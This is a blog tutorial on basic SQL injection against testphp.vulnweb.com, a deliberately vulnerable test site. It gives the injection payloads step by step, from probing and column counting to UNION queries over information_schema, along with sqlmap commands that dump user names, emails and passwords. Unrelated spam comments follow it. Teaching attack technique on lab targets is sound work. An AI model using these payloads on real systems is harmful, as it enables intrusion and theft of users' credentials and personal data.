How to perform a basic SQL Injection Attack? — Ethical Hacking
- Gourav Dhar
- Aug 1, 2022
- 4 min read
How does a SQL Injection attack work?
SQL injection attack is possible when a website exposes inputs to be taken from the user and uses the user input to directly run a query in MySQL. In this blog, I will be demonstrating how to perform a basic SQL Injection Attack on a website, and at the end, I will talk about a tool SQLmap , which automates the entire process.
If you don’t know what SQL Injection Attack is, you can visit this link. https://www.w3schools.com/sql/sql_injection.asp
There’s a website http://testphp.vulnweb.com/listproducts.php?cat=1 which is open for testing php vulnerablities. I will be using this website to perform SQLi attack.
1. Discovering if the website is vulnerable to SQL Injection attacks
The most basic and simple way is to check the URLs of pages you are visiting. If the URL is something of the form http://testphp.vulnweb.com/listproducts.php?cat=1, it is a potential target. To check if the webpage is actually using a SQL backend, you can append \ or a single inverted quote ‘ at the end of URL and see if anything in the page breaks or you get an SQL error. For most cases the error is something like this:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''a\'' at line 1But the error can be anything else as well. For the website http://testphp.vulnweb.com/listproducts.php?cat=1 appending ‘ gives me the following screen
So I have established that SQL injection attack is possible on my target http://testphp.vulnweb.com/listproducts.php?cat=1
In the backend, the application might be running a query similar to
SELECT * FROM XYZ_TABLE WHERE CAT='<the value of id>'The query executed for http://testphp.vulnweb.com/listproducts.php?cat=1‘ would be
SELECT * FROM XYZ_TABLE WHERE CAT=1'And you guessed it right. This will throw an error.
The silver lining to this is now we know we can modify the query in any way we would like to. If I add --+ to the end, the query should run without errors. ( --+ or # will basically comment on anything written after it.This is a handy knowledge, though it may not be useful in this case)
2. Finding out the Databases present
The next step would be to find out the databases present. We make use of the ORDER BY clause here. If I run http://testphp.vulnweb.com/listproducts.php?cat=1 order by 5, the corresponding MySQL query would be
SELECT * FROM XYZ_TABLE WHERE CAT=1 order by 5--+'This will sort the results on the basis of the 5th column
I will repeat this process for different values of column numbers until I get a column number for which the page breaks. for eg. in this case when ORDER BY 12, the page breaks. I now know that the total number of columns is 11. Since the number of columns is 11, I will run a query select all 1,2,3,4,5,6,7,8,9,10,11.
The corresponding MySQL query would look like
SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,2,3,4,5,6,7,8,9,10,11Now navigate the webpage. In some places, you will find some of the numbers between 1 to 11. I see the numbers 7, 2 and 9.
I now know that anything I write in the place of 7, 2 and 9 will be visible. I want to kow the current database, user and version , so I execute
Note: %20 is ASCII for space
I replaced 2 with user(), 7 with database() and 9 with version() .
I will get to know the datatbase, database version and the user details.
I get the following information:
database — acuart
user — acuart@localhost
version — 8.0.22–0ubuntu0.20.04.2
3. Discovering tables and table data in the current database
Once the above information is gathered, everything is going to be very simple. To get the list of tables, I will just run
Corresponding SQL Query:
SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,table_name,3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema = 'acuart'information_schema is the default database which contains list of tables. We used this information to find out the table names. acuart is the database name we got from the previous step.
The webpage would look like:
We got a list of tables:
artists
carts
categ
featured
guestbook
pictures
products
users
4. Discovering column names in a table
Discovering columns of the table users
Corresponding SQL Query:
SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name = 'users'
I get the column names as :
uname
pass
cc
address
email
name
phone
5. Discovering data stored in a table
To view name, email, password of users :
Corresponding SQL Query:
SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,name,3,4,5,6,email,8,pass,10,11 from users
6. Using SQLmap to do the above easily
If I wanted to use sqlmap to do the above, I would have to write the run the following commands on my terminal
sqlmap -u “https//testphp.vulnweb.com/listproducts.php?cat=1" --dbs to get list of databases
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db : get current database
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1" --tables -D acuart : get list of tables in ‘acuart’
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1" --columns -T users -D acuart : get columns in the table ‘users’
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1" -T users -D acuart --dump : store all the data in the table users
Summarising SQL Injection Attacks
SQL Injection attack is one of the most powerful attacks a hacker can perform. There are many ways SQL injection attacks can be prevented like blacklisting or whitelisting certain input characters. Programming frameworks also provide interfaces that allow inputs for only certain fields.
This blog was originally published in the personal blog website of Gourav : https://gourav-dhar.com
_edited.png)
This is a very insightful article on the role of hypnosis in managing Compulsive Disorder. It’s fascinating to see alternative therapies being explored alongside traditional treatments. Understanding such approaches can be crucial for mental health awareness and education. For students studying related fields, seeking public health assignment help can provide additional guidance on topics like mental health interventions, therapy effectiveness, and research methods, ensuring well-rounded academic work.
Discover why Melon Playground has become a cult favorite among sandbox fans—its realistic physics, dark humor, and limitless possibilities make every session wildly unpredictable and endlessly replayable.
Whether you're creating marketing content or academic papers, using an AI Content Editing Service can significantly improve your writing. It quickly detects grammatical errors and enhances sentence structure, allowing you to focus more on your message rather than tedious proofreading.
In Bitlife, your life unfolds year by year. You start as a newborn and make decisions on everything: school, relationships, jobs, health, crime, wealth, and even pets.
Tired of confusing guidelines and endless revisions? Seek professional help with assignment and turn your work into a masterpiece. Our experts simplify even the toughest topics. Ready to impress your professor? Get started today and submit with confidence!